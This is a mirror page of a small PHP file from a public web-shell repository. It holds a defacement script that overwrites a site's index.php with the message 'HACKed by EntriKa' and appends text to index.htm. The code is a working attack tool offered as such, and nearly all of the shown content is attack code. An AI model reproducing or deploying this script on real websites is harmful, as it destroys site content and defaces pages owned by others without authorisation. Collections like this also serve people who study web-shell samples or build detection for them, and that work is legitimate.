mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
13 lines
213 B
Text
13 lines
213 B
Text
<?php
|
|
$entry_line="HACKed by EntriKa";
|
|
$fp = fopen("index.php", "w");
|
|
fputs($fp, $entry_line);
|
|
fclose($fp);
|
|
?>
|
|
|
|
<?
|
|
$fp =@fopen("index.htm", "a+");
|
|
$yazi = "test" . "\r\n";
|
|
fwrite ($fp, "$yazi");
|
|
fclose ($fp);
|
|
?>
|